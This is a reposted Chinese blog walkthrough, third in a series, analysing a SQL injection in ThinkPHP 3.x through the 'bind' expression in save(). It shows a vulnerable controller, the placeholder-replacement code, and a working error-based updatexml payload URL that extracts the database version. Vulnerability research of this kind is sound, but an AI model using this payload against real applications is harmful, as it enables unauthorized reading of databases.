当前位置:首页 > 编程语言 > Thinkphp 3.x bind注入(3)

Thinkphp 3.x bind注入(3)

2021-01-29 03:16

阅读:379

标签:public   条件   upd   amp   where   www   更改   namespace   XML   

接着上篇 https://www.cnblogs.com/cuocuo/p/14329868.html

当exp为bind的时候,虽然会拼接,但是find()和select()是没办法利用的,我们需要更改一下代码

技术图片

 

 

 

 

php
namespace Home\Controller;
use Think\Controller;
use \Think\Logs;
class IndexController extends Controller {
    public function index(){
        $User = M("user");
        $user[‘Id‘] = I(‘id‘);
        $data[‘pwd‘] = I(‘pwd‘);
        $value = $User->where($user)->save($data);
        var_dump($value);
    }
}

http://127.0.0.1/?id[0]=bind&id[1]=123&pwd=cuocuo

技术图片

 

 

 跟进$this->execute()

 

$this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return ‘\‘‘.$that->escapeString($val).‘\‘‘; },$this->bind));

 

技术图片

 

 技术图片

 

 可以看到:0已经被替换成cuocuo了,后面的:123怎么办,我们将其改成:0就可以满足替换条件了

http://127.0.0.1/?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)&pwd=cuocuo

技术图片

 

 

技术图片

 技术图片

 

Thinkphp 3.x bind注入(3)

标签:public   条件   upd   amp   where   www   更改   namespace   XML   

原文地址:https://www.cnblogs.com/cuocuo/p/14335075.html

上一篇:ajax之最简说明

下一篇:lxml webdriver 抓取街拍

文章来自:搜素材网编程语言模块,转载请注明文章出处。
文章标题:Thinkphp 3.x bind注入(3)
文章链接:http://soscw.com/index.php/essay/48498.html

评论

亲,登录后才可以留言!

热门文章

推荐文章

最新文章

置顶文章

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |
搜素材网素材除本站原创外均由用户分享,若发现权利被侵害,请联系及时联系我们,我们会在第一时间进行处理。
特别说明:本站所有资源除本站原创外仅供学习与参考,请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ:点击这里给我发消息
Copyright © 2024 soscw.com 搜素材网素材网版权所有 蜀ICP备18015633号-1